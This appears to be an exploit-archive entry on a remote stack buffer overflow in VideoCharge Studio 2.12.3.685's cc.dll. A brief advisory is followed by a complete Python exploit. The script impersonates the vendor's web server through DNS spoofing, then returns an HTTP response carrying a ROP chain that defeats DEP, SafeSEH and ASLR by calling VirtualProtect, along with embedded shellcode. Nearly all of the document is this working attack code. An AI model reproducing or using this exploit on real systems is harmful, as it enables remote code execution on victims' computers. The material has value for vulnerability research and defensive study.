source: https://www.securityfocus.com/bid/65685/info
VideoCharge Studio is prone to a remote stack-based buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts likely result in denial-of-service conditions.
VideoCharge Studio 2.12.3.685 is vulnerable; other versions may also be affected.
#!/usr/bin/python
# Exploit Title: VideoCharge Studio v2.12.3.685 cc.dll GetHttpResponse()
MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)
# Version: v2.12.3.685
# Date: 2014-02-18
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.videocharge.com
# Tested on: Win7-GER (DEP enabled)
#
# Howto / Notes:
# Since it's a MITM RCE you need to spoof the DNS Record for
www.videocharge.com in order to successfully exploit this vulnerability
#
from socket import *
from struct import pack
from time import sleep
host = "192.168.0.1"
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
# Thanks Giuseppe D'Amore for the amazing shellcode
# http://www.exploit-db.com/exploits/28996/
shellcode =
("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
junk0 = "\x90" * 1277
junk1 = "\x90" * 1900
nops="\x90" * 30
jmpesp=pack('<L',0x102340e8) * 5 # jmp esp | {PAGE_EXECUTE_READ}
[cc.dll]
# jump to controlled memory
eip=pack('<L',0x61b84af1) # {pivot 4124 / 0x101c} # ADD ESP,101C # RETN
[zlib1.dll]
#
# ROP registers structure:
# EBP - VirtualProtect() call
# ESP - lpAddress
# EBX - dwSize
# EDX - flNewProtect
# ECX - lpflOldProtect
#
# Craft VirtualProtect() call (0x0080D816) via [DE2D66F9 XOR DEADBEEF]
and MOV to EBP
rop = pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
rop += pack('<L',0xDE2D66F9) # XOR param 1
rop += pack('<L',0x10206ac5) # POP EBX # RETN [cc.dll]
rop += pack('<L',0xDEADBEEF) # XOR param 2
rop += pack('<L',0x1002fb27) # XOR EDI,EBX # ADD DL,BYTE PTR DS:[EAX] #
RETN [cc.dll]
rop += pack('<L',0x101f7572) # MOV EAX,EDI # POP EDI # RETN [cc.dll]
rop += pack('<L',0xDEADBEEF) # Filler
rop += pack('<L',0x101fbc62) # XCHG EAX,EBP # RETN [cc.dll]
# Craft VirtualProtect() dwSize in EAX and MOV to EBX
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
rop += pack('<L',0x101f2adc) # ADD EAX,500 # RETN [cc.dll]
rop += pack('<L',0x1023ccfb) # XCHG EAX,EBX # RETN [cc.dll]
# Craft VirtualProtect() flNewProtect in EAX and MOV to EDX
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
rop += pack('<L',0x102026a1) # ADD EAX,25 # RETN [cc.dll]
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
rop += pack('<L',0x102026b1) # ADD EAX,3 # RETN [cc.dll]
rop += pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
rop += pack('<L',0x61b90402) # MOV EDX,ECX # RETN [zlib1.dll]
# Put writable offset for VirtualProtect() lpflOldProtect to ECX
rop += pack('<L',0x1020aacf) # POP ECX # RETN [cc.dll]
rop += pack('<L',0x61B96180) # writable location [zlib1.dll]
# POP a value from the stack after PUSHAD and POP value to ESI
# as a preparation for the VirtualProtect() call
rop += pack('<L',0x61b850a4) # POP ESI # RETN [zlib1.dll]
rop += pack('<L',0x61B96180) # writable location from [zlib1.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
# Achievement unlocked: PUSHAD
rop += pack('<L',0x101e93d6) # PUSHAD # RETN [cc.dll]
rop += pack('<L',0x102340c5) # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]
payload = junk0 + eip + junk1 + rop + jmpesp + nops + shellcode
buffer = "HTTP/1.1 200 OK\r\n"
buffer += "Date: Sat, 09 Feb 2014 13:33:37 GMT\r\n"
buffer += "Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with
Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g\r\n"
buffer += "X-Powered-By: PHP/5.2.6-1+lenny16\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 4000\r\n"
buffer += "Connection: close\r\n"
buffer += "Content-Type: text/html\r\n\r\n"
buffer += payload
buffer += "\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending exploit: OK\n"
sleep(3)
cl.close()
s.close()